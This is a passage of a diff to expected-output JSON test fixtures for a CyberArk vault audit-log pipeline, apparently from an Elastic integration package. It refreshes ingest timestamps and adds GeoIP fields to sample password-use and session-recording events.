Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json index a67cff14a59..e6d6e6d9ddd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json @@ -65,7 +65,7 @@ "event": { "severity": 2, "action": "psm upload recording", - "ingested": "2021-12-09T13:36:52.241443500Z", + "ingested": "2021-12-14T14:42:18.683778092Z", "original": "\u003c5\u003e1 2021-03-25T09:20:56Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e304\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Upload Recording\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Upload Recording\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Upload Recording\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 05:20:56\",\"IsoTimestamp\":\"2021-03-25T09:20:56Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"304\",\"Desc\":\"PSM Upload Recording\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_COMP01\",\"Action\":\"PSM Upload Recording\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"Root\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"DstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\",\"Message\":\"PSM Upload Recording\",\"GatewayStation\":\"\"}}}", "code": "304", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json index 7960201337d..8580c8fa481 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json @@ -75,7 +75,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)", - "ingested": "2021-12-09T13:36:52.374483400Z", + "ingested": "2021-12-14T14:42:18.814507071Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"308\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "308", "kind": "event", @@ -100,10 +100,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -175,7 +184,7 @@ "event": { "severity": 2, "reason": "fun and profit", - "ingested": "2021-12-09T13:36:52.374492200Z", + "ingested": "2021-12-14T14:42:18.814509300Z", "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -199,10 +208,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -274,7 +292,7 @@ "event": { "severity": 2, "reason": "FOR FUN.", - "ingested": "2021-12-09T13:36:52.374498300Z", + "ingested": "2021-12-14T14:42:18.814509792Z", "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -298,10 +316,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -373,7 +400,7 @@ "event": { "severity": 2, "reason": "For fun and profit", - "ingested": "2021-12-09T13:36:52.374504300Z", + "ingested": "2021-12-14T14:42:18.814510259Z", "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -397,10 +424,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -472,7 +508,7 @@ "event": { "severity": 2, "reason": "Because I say so", - "ingested": "2021-12-09T13:36:52.374510200Z", + "ingested": "2021-12-14T14:42:18.814510641Z", "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -496,10 +532,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -571,7 +616,7 @@ "event": { "severity": 2, "reason": "for fun", - "ingested": "2021-12-09T13:36:52.374516Z", + "ingested": "2021-12-14T14:42:18.814511023Z", "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" 